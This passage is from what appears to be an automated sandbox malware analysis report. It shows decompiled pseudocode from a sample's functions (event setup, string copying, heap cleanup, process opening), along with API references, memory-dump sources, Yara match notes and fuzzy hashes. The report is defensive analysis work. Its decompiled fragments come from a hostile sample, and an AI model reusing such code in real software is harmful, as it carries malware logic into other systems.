            					_push( &_v64);
            					if( *0x202a100() == 0) {
            						_t28 = GetLastError();
            					}
            					_push(1);
            					E02025B56();
            				}
            				return _t28;
            			}














            0x020223c4
            0x020223cb
            0x020223d9
            0x020223dd
            0x020223e7
            0x020223ec
            0x020223f1
            0x020223f6
            0x02022400
            0x0202240a
            0x0202240a
            0x02022402
            0x02022402
            0x02022402
            0x02022402
            0x02022410
            0x02022416
            0x02022417
            0x0202241a
            0x0202241d
            0x02022420
            0x02022428
            0x02022431
            0x02022439
            0x02022439
            0x0202243b
            0x0202243d
            0x0202243d
            0x02022447

            APIs
              • Part of subcall function 02023A63: SysAllocString.OLEAUT32(00000000), ref: 02023ABD
              • Part of subcall function 02023A63: SysAllocString.OLEAUT32(0070006F), ref: 02023AD1
              • Part of subcall function 02023A63: SysAllocString.OLEAUT32(00000000), ref: 02023AE3
            • memset.NTDLL ref: 020223E7
            • GetLastError.KERNEL32 ref: 02022433
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: AllocString$ErrorLastmemset
            • String ID: <$@MetNet
            • API String ID: 3736384471-3263418992
            • Opcode ID: 35e023a102302c9e73a2e6737dc87c91a8898230302031882e9bfa6aaa81ed5d
            • Instruction ID: 1c059124468679c0d7aee99799e1df2d9de019cb3076f5c0e7ea623b7d477dbe
            • Opcode Fuzzy Hash: 35e023a102302c9e73a2e6737dc87c91a8898230302031882e9bfa6aaa81ed5d
            • Instruction Fuzzy Hash: 6E011B71D00328AFCB11EFA9D884BCEBBF8BB08744F414427ED04A7240E77499489B94
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,01FC1C63), ref: 01FC1FDE
            • GetVersion.KERNEL32(?,01FC1C63), ref: 01FC1FED
            • GetCurrentProcessId.KERNEL32(?,01FC1C63), ref: 01FC2009
            • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01FC1C63), ref: 01FC2022
            Memory Dump Source
            • Source File: 00000000.00000002.513718671.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_1fc0000_Server.jbxd
            Yara matches
            Similarity
            • API ID: Process$CreateCurrentEventOpenVersion
            • String ID:
            • API String ID: 845504543-0
            • Opcode ID: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
            • Instruction ID: e7670e7005d536471b3060dcf2f6b7c2d11700cd52a78e0e4125093b4f413cf4
            • Opcode Fuzzy Hash: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
            • Instruction Fuzzy Hash: B7F069B0981302DBE7508F7CBF09B553F65E785B52F00003AE645EA1E8D7B18982DB5C
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E02027843(void* __esi) {
            				struct _SECURITY_ATTRIBUTES* _v4;
            				void* _t8;
            				void* _t10;
            
            				_v4 = 0;
            				memset(__esi, 0, 0x38);
            				_t8 = CreateEventA(0, 1, 0, 0);
            				 *(__esi + 0x1c) = _t8;
            				if(_t8 != 0) {
            					_t10 = CreateEventA(0, 1, 1, 0);
            					 *(__esi + 0x20) = _t10;
            					if(_t10 == 0) {
            						CloseHandle( *(__esi + 0x1c));
            					} else {
            						_v4 = 1;
            					}
            				}
            				return _v4;
            			}






            0x0202784d
            0x02027851
            0x02027866
            0x02027868
            0x0202786d
            0x02027873
            0x02027875
            0x0202787a
            0x02027885
            0x0202787c
            0x0202787c
            0x0202787c
            0x0202787a
            0x02027893

            APIs
            • memset.NTDLL ref: 02027851
            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,746981D0,00000000,00000000), ref: 02027866
            • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02027873
            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,02023F34,00000000,?), ref: 02027885
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: CreateEvent$CloseHandlememset
            • String ID:
            • API String ID: 2812548120-0
            • Opcode ID: 59e650e8cf3b3a2c391cfc995c0588ef3ef85b78dca65ff0cb4b832a8d8af89f
            • Instruction ID: 6ea09701cd864fd738a71a4b490cae87a684e6d39029924dfd20a77b66b14d0b
            • Opcode Fuzzy Hash: 59e650e8cf3b3a2c391cfc995c0588ef3ef85b78dca65ff0cb4b832a8d8af89f
            • Instruction Fuzzy Hash: 8BF03AB154431C6FD3206F669CC482BFBECEB8119CB224D2EB14292521C675A8189A61
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E02023230() {
            				void* _t1;
            				intOrPtr _t5;
            				void* _t6;
            				void* _t7;
            				void* _t11;
            
            				_t1 =  *0x202a30c; // 0x1b4
            				if(_t1 == 0) {
            					L8:
            					return 0;
            				}
            				SetEvent(_t1);
            				_t11 = 0x7fffffff;
            				while(1) {
            					SleepEx(0x64, 1);
            					_t5 =  *0x202a35c; // 0x0
            					if(_t5 == 0) {
            						break;
            					}
            					_t11 = _t11 - 0x64;
            					if(_t11 > 0) {
            						continue;
            					}
            					break;
            				}
            				_t6 =  *0x202a30c; // 0x1b4
            				if(_t6 != 0) {
            					CloseHandle(_t6);
            				}
            				_t7 =  *0x202a2d8; // 0x28b0000
            				if(_t7 != 0) {
            					HeapDestroy(_t7);
            				}
            				goto L8;
            			}








            0x02023230
            0x02023237
            0x02023281
            0x02023283
            0x02023283
            0x0202323b
            0x02023241
            0x02023246
            0x0202324a
            0x02023250
            0x02023257
            0x00000000
            0x00000000
            0x02023259
            0x0202325e
            0x00000000
            0x00000000
            0x00000000
            0x0202325e
            0x02023260
            0x02023268
            0x0202326b
            0x0202326b
            0x02023271
            0x02023278
            0x0202327b
            0x0202327b
            0x00000000

            APIs
            • SetEvent.KERNEL32(000001B4,00000001,0202109A), ref: 0202323B
            • SleepEx.KERNEL32(00000064,00000001), ref: 0202324A
            • CloseHandle.KERNEL32(000001B4), ref: 0202326B
            • HeapDestroy.KERNEL32(028B0000), ref: 0202327B
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: CloseDestroyEventHandleHeapSleep
            • String ID:
            • API String ID: 4109453060-0
            • Opcode ID: d44276bb748ceed3668ddca5a6a5558599e97633aece276bffb9eb9c9d90e723
            • Instruction ID: 8cd04bc9480aa80cc2c24bfb6760dfdb430121083582a51d6fa7833dc61cc957
            • Opcode Fuzzy Hash: d44276bb748ceed3668ddca5a6a5558599e97633aece276bffb9eb9c9d90e723
            • Instruction Fuzzy Hash: 7EF03075F803659BDB715B3999C8A4237DCBB04761B360952BD04E32C0DF2CD46DA960
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 58%
            			E02022058(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
            				intOrPtr* _v8;
            				void* _t17;
            				intOrPtr* _t22;
            				void* _t27;
            				char* _t30;
            				void* _t33;
            				void* _t34;
            				void* _t36;
            				void* _t37;
            				void* _t39;
            				int _t42;
            
            				_t17 = __eax;
            				_t37 = 0;
            				__imp__(_a4, _t33, _t36, _t27, __ecx);
            				_t2 = _t17 + 1; // 0x1
            				_t28 = _t2;
            				_t34 = E020233DC(_t2);
            				if(_t34 != 0) {
            					_t30 = E020233DC(_t28);
            					if(_t30 == 0) {
            						E020261DA(_t34);
            					} else {
            						_t39 = _a4;
            						_t22 = E02027AE9(_t39);
            						_v8 = _t22;
            						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
            							_a4 = _t39;
            						} else {
            							_t26 = _t22 + 2;
            							_a4 = _t22 + 2;
            							_t22 = E02027AE9(_t26);
            							_v8 = _t22;
            						}
            						if(_t22 == 0) {
            							__imp__(_t34, _a4);
            							 *_t30 = 0x2f;
            							 *((char*)(_t30 + 1)) = 0;
            						} else {
            							_t42 = _t22 - _a4;
            							memcpy(_t34, _a4, _t42);
            							 *((char*)(_t34 + _t42)) = 0;
            							__imp__(_t30, _v8);
            						}
            						 *_a8 = _t34;
            						_t37 = 1;
            						 *_a12 = _t30;
            					}
            				}
            				return _t37;
            			}














            0x02022058
            0x02022062
            0x02022064
            0x0202206a
            0x0202206a
            0x02022073
            0x02022077
            0x02022083
            0x02022087
            0x020220fb
            0x02022089
            0x02022089
            0x0202208d
            0x02022092
            0x02022097
            0x020220b1
            0x020220a0
            0x020220a0
            0x020220a4
            0x020220a7
            0x020220ac
            0x020220ac
            0x020220b6
            0x020220de
            0x020220e4
            0x020220e7
            0x020220b8
            0x020220ba
            0x020220c2
            0x020220cd
            0x020220d2
            0x020220d2
            0x020220ee
            0x020220f5
            0x020220f6
            0x020220f6
            0x02022087
            0x02022106

            APIs
            • lstrlen.KERNEL32(00000000,00000008,?,74654D40,?,?,020251F7,?,?,?,?,00000102,020221E7,?,?,746981D0), ref: 02022064
              • Part of subcall function 020233DC: RtlAllocateHeap.NTDLL(00000000,00000000,020262F6), ref: 020233E8
              • Part of subcall function 02027AE9: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,02022092,00000000,00000001,00000001,?,?,020251F7,?,?,?,?,00000102), ref: 02027AF7
              • Part of subcall function 02027AE9: StrChrA.SHLWAPI(?,0000003F,?,?,020251F7,?,?,?,?,00000102,020221E7,?,?,746981D0,00000000), ref: 02027B01
            • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,020251F7,?,?,?,?,00000102,020221E7,?), ref: 020220C2
            • lstrcpy.KERNEL32(00000000,00000000), ref: 020220D2
            • lstrcpy.KERNEL32(00000000,00000000), ref: 020220DE
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
            • String ID:
            • API String ID: 3767559652-0
            • Opcode ID: d1722f477506aefda9261d5bde0fc2016d865f9c868c5b2172b0e37f96d3d0ed
            • Instruction ID: 795bf19893f18e01a922130d8e0b18cc4e3bcf6cc04481057317ec6943e51b4d
            • Opcode Fuzzy Hash: d1722f477506aefda9261d5bde0fc2016d865f9c868c5b2172b0e37f96d3d0ed
            • Instruction Fuzzy Hash: C221F331500339EFCB125FA4CC84A9EBFF9AF05354B154052FC049B201D735DA48EBA0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E02025DE4(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
            				void* _v8;
            				void* _t18;
            				int _t25;
            				int _t29;
            				int _t34;
            
            				_t29 = lstrlenW(_a4);
            				_t25 = lstrlenW(_a8);
            				_t18 = E020233DC(_t25 + _t29 + _t25 + _t29 + 2);
            				_v8 = _t18;
            				if(_t18 != 0) {
            					_t34 = _t29 + _t29;
            					memcpy(_t18, _a4, _t34);
            					_t10 = _t25 + 2; // 0x2
            					memcpy(_v8 + _t34, _a8, _t25 + _t10);
            				}
            				return _v8;
            			}








            0x02025df9
            0x02025dfd
            0x02025e07
            0x02025e0c
            0x02025e11
            0x02025e13
            0x02025e1b
            0x02025e20
            0x02025e2e
            0x02025e33
            0x02025e3d

            APIs
            • lstrlenW.KERNEL32(004F0053,?,74655520,00000008,02CA9270,?,020252D0,004F0053,02CA9270,?,?,?,?,?,?,020268B6), ref: 02025DF4
            • lstrlenW.KERNEL32(020252D0,?,020252D0,004F0053,02CA9270,?,?,?,?,?,?,020268B6), ref: 02025DFB
              • Part of subcall function 020233DC: RtlAllocateHeap.NTDLL(00000000,00000000,020262F6), ref: 020233E8
            • memcpy.NTDLL(00000000,004F0053,746569A0,?,?,020252D0,004F0053,02CA9270,?,?,?,?,?,?,020268B6), ref: 02025E1B
            • memcpy.NTDLL(746569A0,020252D0,00000002,00000000,004F0053,746569A0,?,?,020252D0,004F0053,02CA9270), ref: 02025E2E
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: lstrlenmemcpy$AllocateHeap
            • String ID:
            • API String ID: 2411391700-0
            • Opcode ID: 67091f61ebb5fe8e225fba4dc8dab482acb446f56d6d57debf793ca9eff757d0
            • Instruction ID: 4b5d6c8c20d3ec7be9a91f60ff305fabe10d25eda92d9b61248e5ce89a667afc
            • Opcode Fuzzy Hash: 67091f61ebb5fe8e225fba4dc8dab482acb446f56d6d57debf793ca9eff757d0
            • Instruction Fuzzy Hash: 71F03772900229BB8F15AFA8CC84CDE7BADEF083547514063A90897201EA35EA189BA4
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • lstrlen.KERNEL32(02CA9C10,00000000,00000000,00000000,02023EF9,00000000), ref: 02027573
            • lstrlen.KERNEL32(?), ref: 0202757B
              • Part of subcall function 020233DC: RtlAllocateHeap.NTDLL(00000000,00000000,020262F6), ref: 020233E8
            • lstrcpy.KERNEL32(00000000,02CA9C10), ref: 0202758F
            • lstrcat.KERNEL32(00000000,?), ref: 0202759A
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
            • String ID:
            • API String ID: 74227042-0
            • Opcode ID: 9616515cc19cd15d940aeb029b19335278ea60b04b42398b7e055df1211f864f
            • Instruction ID: 5f9024759f50c5e6f1957c664a803a66eddbc2c2b2ae40f5fc2dced882103e87
            • Opcode Fuzzy Hash: 9616515cc19cd15d940aeb029b19335278ea60b04b42398b7e055df1211f864f
            • Instruction Fuzzy Hash: 6AE09B739017385F87215BE49C88C5FF7ADFF896507150817F600D3100C7799919DBA5
            Uniqueness

            Uniqueness Score: -1.00%